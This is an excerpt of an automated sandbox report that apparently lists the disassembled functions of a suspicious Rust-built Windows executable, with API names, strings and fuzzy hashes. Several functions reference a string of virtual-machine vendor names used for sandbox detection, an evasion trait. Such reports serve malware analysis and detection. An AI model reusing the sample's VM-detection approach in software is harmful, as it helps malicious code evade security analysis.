                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID: AttributesFile
                                        • String ID:
                                        • API String ID: 3188754299-0
                                        • Opcode ID: cf50fb6609d1fef71a3daa6ac54220e2b16af973c411700e32f6df58c2279079
                                        • Instruction ID: 7dd4ceb4cea94b6a36403289d61c7681f1176235828b4770c79dab830e337af4
                                        • Opcode Fuzzy Hash: cf50fb6609d1fef71a3daa6ac54220e2b16af973c411700e32f6df58c2279079
                                        • Instruction Fuzzy Hash: D4216D33F09A1199EB119FA2F8811ADA374B7147A8F944531DE6E53BC8EF38D592C350
                                        Function 00007FF7F4126C2E Relevance: 1.3, APIs: 1, Instructions: 31COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID: Process$CloseCurrentHandlePrng
                                        • String ID:
                                        • API String ID: 842889843-0
                                        • Opcode ID: 54414ade01f3eaa8aa42d5ffd990672667fa5a2631ec548c5acdd5774dc2c67e
                                        • Instruction ID: 425cd0872ad15f8e0222340336234c328850d5406e2abf54abbef41035d5cdba
                                        • Opcode Fuzzy Hash: 54414ade01f3eaa8aa42d5ffd990672667fa5a2631ec548c5acdd5774dc2c67e
                                        • Instruction Fuzzy Hash: 8FF06232A08B45C6EB116F26E5803ADA752D741FE4F948031CE6D877C8DE3CE5C58390

                                        Non-executed Functions

                                        Function 00007FF7F412AA60 Relevance: 44.1, APIs: 17, Strings: 8, Instructions: 333libraryloadersynchronizationCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID: AddressProc$CurrentProcess$Mutex$CloseCreateHandleLibraryLoadObjectReleaseSingleWaitlstrlen
                                        • String ID: EnumerateLoadedModulesW64$SymGetOptions$SymGetSearchPathW$SymInitializeW$SymSetOptions$SymSetSearchPathW$assertion failed: len >= 0$dbghelp.dll
                                        • API String ID: 422451348-310313858
                                        • Opcode ID: 9ec890d9eb561b8ec03aae37693fd9b8a1d82bb0876e46e927a256a399530a50
                                        • Instruction ID: 80034eaa31fe152910bbe18cefa85a77435b6c03867dbf09d607eab2b094b813
                                        • Opcode Fuzzy Hash: 9ec890d9eb561b8ec03aae37693fd9b8a1d82bb0876e46e927a256a399530a50
                                        • Instruction Fuzzy Hash: 2EE18F21F096428BEB51AF26F8817B9A7A0BF44798F844634DD2D477E4EF3CD18583A0
                                        Function 00007FF7F4139174 Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                        • String ID:
                                        • API String ID: 3140674995-0
                                        • Opcode ID: ed964a79ad5c71b51470b13f33e1ceaf77e9862fef75c8a2799fdefc0e4b490c
                                        • Instruction ID: e7d1397d4f2a52c2e865609a2faeab88983dc0a1d4c81c1f7f1a8b3c56dafefb
                                        • Opcode Fuzzy Hash: ed964a79ad5c71b51470b13f33e1ceaf77e9862fef75c8a2799fdefc0e4b490c
                                        • Instruction Fuzzy Hash: D3316F72A18B818AEB609F62F8803F9B764FB85744F844039DA5D57B99EF38C548C760
                                        Function 00007FF7F411F330 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 220windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        • NTDLL.DLL, xrefs: 00007FF7F411F385
                                        • assertion failed: self.is_char_boundary(new_len)/rustc/eeb90cda1969383f56a2637cbd3037bdf598841c\library\alloc\src\string.rs, xrefs: 00007FF7F411F66C
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID: ErrorFormatHandleLastMessageModule
                                        • String ID: NTDLL.DLL$assertion failed: self.is_char_boundary(new_len)/rustc/eeb90cda1969383f56a2637cbd3037bdf598841c\library\alloc\src\string.rs
                                        • API String ID: 1273946083-2010291737
                                        • Opcode ID: 96be6f57b779d662e4bcd2e87a3bd71604cd955901bcb329d8d31bec27ed1a52
                                        • Instruction ID: b7a70c0529fa87d1b1cef9964eb40ac9d02e52b7e4b53b5f3a0277525a00b1d0
                                        • Opcode Fuzzy Hash: 96be6f57b779d662e4bcd2e87a3bd71604cd955901bcb329d8d31bec27ed1a52
                                        • Instruction Fuzzy Hash: 83A1D932E097C296E7719F22F8807FCA6B5BB853A4F804135CA6D06BD4EF789645D390
                                        Function 00007FF7F4127520 Relevance: 7.8, APIs: 5, Instructions: 271threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID: AttributeInitializeListProcThread
                                        • String ID:
                                        • API String ID: 1263136677-0
                                        • Opcode ID: 25395b67cd61b75cc73e3c4270649077a9519a336f1647721255863f1f85be5d
                                        • Instruction ID: fce62a1cd040b37dbf050c10dafd243ae543c6894f7b216e031c962a61a9f07e
                                        • Opcode Fuzzy Hash: 25395b67cd61b75cc73e3c4270649077a9519a336f1647721255863f1f85be5d
                                        • Instruction Fuzzy Hash: 4AA1B362F18651C2FB14AF27F4847BAA6A0BB46BA4F944631DE3D437D4DE3C9245C350
                                        Function 00007FF7F413904C Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                        • String ID:
                                        • API String ID: 2933794660-0
                                        • Opcode ID: 43b5c4cba9f747e9d25ac04b51d92f885defc1a8dfb37f1489eaa0b42e208026
                                        • Instruction ID: 2f30ab2ca6cbadb4d924923fe3affc82f85b9dbf09f30182bb90623bcd39a602
                                        • Opcode Fuzzy Hash: 43b5c4cba9f747e9d25ac04b51d92f885defc1a8dfb37f1489eaa0b42e208026
                                        • Instruction Fuzzy Hash: 87114C22F18F018AEB00DF62F8942B873B4FB19B58F840A31DA6D427A4EF38D1548390
                                        Function 00007FF7F4131140 Relevance: 4.6, Strings: 3, Instructions: 821COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: .llvm./rust/deps\rustc-demangle-0.1.24\src/lib.rs$__ZN$`fmt::Error`s should be impossible without a `fmt::Formatter`
                                        • API String ID: 0-1033176386
                                        • Opcode ID: 7630a6dac504c9da00261c8a14eb9cbe2da4fb8b3279a6e02788394730d31ae3
                                        • Instruction ID: 4236dd25dea407c22ff780a1d9db882dd46b75807daa85f29d06f6f1b022b3c4
                                        • Opcode Fuzzy Hash: 7630a6dac504c9da00261c8a14eb9cbe2da4fb8b3279a6e02788394730d31ae3
                                        • Instruction Fuzzy Hash: 89621462E1C6A287F715AF52E4842BDA762BB057A4FC44231DE7E076C4DF38D944E3A0
                                        Function 00007FF7F413EF00 Relevance: 4.1, Strings: 3, Instructions: 306COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Authenti$GenuineI$HygonGen
                                        • API String ID: 0-696657513
                                        • Opcode ID: 9dbf57bd29ded03597238e77f78506ede310607914066700f8c9cb9e781dd6de
                                        • Instruction ID: 98579eb88ceffae6545eec442ba507c70114d0525586bdaa7cc503629fcb33b1
                                        • Opcode Fuzzy Hash: 9dbf57bd29ded03597238e77f78506ede310607914066700f8c9cb9e781dd6de
                                        • Instruction Fuzzy Hash: 8C9127A7B2595102FB5C8996FC62BB94892B3587C8F48A03DED6B97BC4D97CC9118240
                                        Function 00007FF7F412D000 Relevance: 1.6, Strings: 1, Instructions: 395COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: punycode{-}0
                                        • API String ID: 0-2450133883
                                        • Opcode ID: 97c5819379e5ee1c581f9b4e4d140716286a02ff531cc5872d525446b3a5b513
                                        • Instruction ID: 7f0568542b9963903f71fbf04f7964b0ab344d569fc23d42676874500956eeca
                                        • Opcode Fuzzy Hash: 97c5819379e5ee1c581f9b4e4d140716286a02ff531cc5872d525446b3a5b513
                                        • Instruction Fuzzy Hash: AFE12962F1868A87FB649F26F4847F9A651BB45798F808231CD2D47BC4DF3CE64583A0
                                        Function 00007FF7F4136CA0 Relevance: 1.6, Strings: 1, Instructions: 382COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 00000000
                                        • API String ID: 0-3221785859
                                        • Opcode ID: 4eeb912c39fe0b6fd1cdb7a9e74c198c1b0e3baab5bcb6297cfd9094762d58d7
                                        • Instruction ID: 57a87f106df9e42924b6ff8690cda80483d48d6682c2e59e36c8ce4c3f759949
                                        • Opcode Fuzzy Hash: 4eeb912c39fe0b6fd1cdb7a9e74c198c1b0e3baab5bcb6297cfd9094762d58d7
                                        • Instruction Fuzzy Hash: 51D13B22F086528BF725DE67F4803B9A696AB51384F84C631ED3D07BD4DF38D94A9390
                                        Function 00007FF7F411BB60 Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 0123456789abcdef
                                        • API String ID: 0-1757737011
                                        • Opcode ID: 1f7dc4a732e5e32f7183587c526e160b9137016290444ede52eefc1499fcd771
                                        • Instruction ID: 7bde6ca09123f2a7a1ca6e809bc013e5e2be30c954f39a16ae7cdc6b55ad7bf7
                                        • Opcode Fuzzy Hash: 1f7dc4a732e5e32f7183587c526e160b9137016290444ede52eefc1499fcd771
                                        • Instruction Fuzzy Hash: EE61BC52E0C5D14AF728AF35E4A02BDAF70AB55358F845139DA7B2B7D4CA3C9101D370
                                        Function 00007FF7F4133930 Relevance: 1.4, Strings: 1, Instructions: 156COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 0123456789abcdefBorrowMutErroralready borrowed:
                                        • API String ID: 0-1320686809
                                        • Opcode ID: 7187579c735241f4dfc3b45842631f3c3574dd8905b111c57d23c3362765d900
                                        • Instruction ID: 824952ac5aee0ccfd332d053a1958560afc93e40e9ee9382a309db6b41f46e6f
                                        • Opcode Fuzzy Hash: 7187579c735241f4dfc3b45842631f3c3574dd8905b111c57d23c3362765d900
                                        • Instruction Fuzzy Hash: CB517D63F1D2E19FE3219B79E400AAC7F619F11B44F4480A4CB9C1BFD6C61AC119E3A5
                                        Function 00007FF7F41284D0 Relevance: 1.4, Strings: 1, Instructions: 139COMMON
                                        Download Yara Rule
                                        Strings
                                        • USERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel, xrefs: 00007FF7F412866E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: USERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
                                        • API String ID: 0-2313043791
                                        • Opcode ID: 388be00aa6fcc4f7e68e27d4eb5c03cb8b3c0634eb20838a9b5c367dac4ca083
                                        • Instruction ID: 6963b6882b4e0fd71256213ec7d73a3b833cd4fe11a5b44fa34dc3e82b73836e
                                        • Opcode Fuzzy Hash: 388be00aa6fcc4f7e68e27d4eb5c03cb8b3c0634eb20838a9b5c367dac4ca083
                                        • Instruction Fuzzy Hash: FF5193A2F1461186FB25AF56EC442B8E2B1BB147A8F84C631DE6C436D4DF7C96D1C2A0
                                        Function 00007FF7F41142E0 Relevance: 1.4, Strings: 1, Instructions: 108COMMON
                                        Download Yara Rule
                                        Strings
                                        • USERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel, xrefs: 00007FF7F41142EB
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: USERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
                                        • API String ID: 0-2313043791
                                        • Opcode ID: 4462cddbd9253b614b80d496a6a895509d001ce948bc0c70f5788f88d1d9c494
                                        • Instruction ID: 7dbd4b0c001213f5dc6be91397485c05f0c77f828e8a330c55414606301f8e96
                                        • Opcode Fuzzy Hash: 4462cddbd9253b614b80d496a6a895509d001ce948bc0c70f5788f88d1d9c494
                                        • Instruction Fuzzy Hash: C731F6639286E146D7688F12F94463AA678BB44BA0F845135DFBA027D0EAB8D5E0D350
                                        Function 00007FF7F4101000 Relevance: 1.3, Strings: 1, Instructions: 63COMMON
                                        Download Yara Rule
                                        Strings
                                        • USERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel, xrefs: 00007FF7F4101018
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: USERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
                                        • API String ID: 0-2313043791
                                        • Opcode ID: b3064131c55f79c0ee6adb8ff720aa2cdd455233e95fb1451f5bd72ba3873b7c
                                        • Instruction ID: de1530378cd4bca142df533f7da08bc3e37aec41d34b9c2a0a700bf114de6a45
                                        • Opcode Fuzzy Hash: b3064131c55f79c0ee6adb8ff720aa2cdd455233e95fb1451f5bd72ba3873b7c
                                        • Instruction Fuzzy Hash: 7921D322F14A6189FB10AE6BE4803ED6771AB48BE8F548531DE6D17BC8DE2ED0408390
                                        Function 00007FF7F411E030 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID: HeapProcess
                                        • String ID:
                                        • API String ID: 54951025-0
                                        • Opcode ID: 8eb1d5c7623788cc2fe55e16711991210c9ba43385e143f39a3a39ebfd7e5168
                                        • Instruction ID: feb7ff4b0077bf1816cbcebf06dbb057b3efdf1239cc86093c1572821410d726
                                        • Opcode Fuzzy Hash: 8eb1d5c7623788cc2fe55e16711991210c9ba43385e143f39a3a39ebfd7e5168
                                        • Instruction Fuzzy Hash: A4F09612F4EA418BF7556F87F88417596946F88BE0F8C4134DD1C423D0EE2CE5C18260
                                        Function 00007FF7F410FCF0 Relevance: .6, Instructions: 628COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8c20d947a120ca590f48418ecf91ee7b61298d06be275df6ba079d417f687728
                                        • Instruction ID: 94ed66abd745442abfeb6bbc2b3871d45b31283e30523bc039bf79575595dcfd
                                        • Opcode Fuzzy Hash: 8c20d947a120ca590f48418ecf91ee7b61298d06be275df6ba079d417f687728
                                        • Instruction Fuzzy Hash: 7E326822F0869686FB119F26E4806FCAB64BB557E8FD14232DE6E53AC1DF38D145C390
                                        Function 00007FF7F4101810 Relevance: .6, Instructions: 626COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 221ed2624c55a2e28807d3ce3963ad646ab2a21044d519d964c442750a414cd7
                                        • Instruction ID: 54ce8aa16e4f6c1fb0bd7070ab40d63c7393988a7b5395d3ae439450500ba109
                                        • Opcode Fuzzy Hash: 221ed2624c55a2e28807d3ce3963ad646ab2a21044d519d964c442750a414cd7
                                        • Instruction Fuzzy Hash: 64324722F1C68242FB21AE2AF0887F9EB51EB657D4FD44231EAAD126C5DF2DD145C390
                                        Function 00007FF7F4117130 Relevance: .5, Instructions: 500COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID: ErrorHandleLast
                                        • String ID:
                                        • API String ID: 2586478127-0
                                        • Opcode ID: b34943c36c60378abf8c1f298144ab8f735b3069bf5e9b792ee67a0488236842
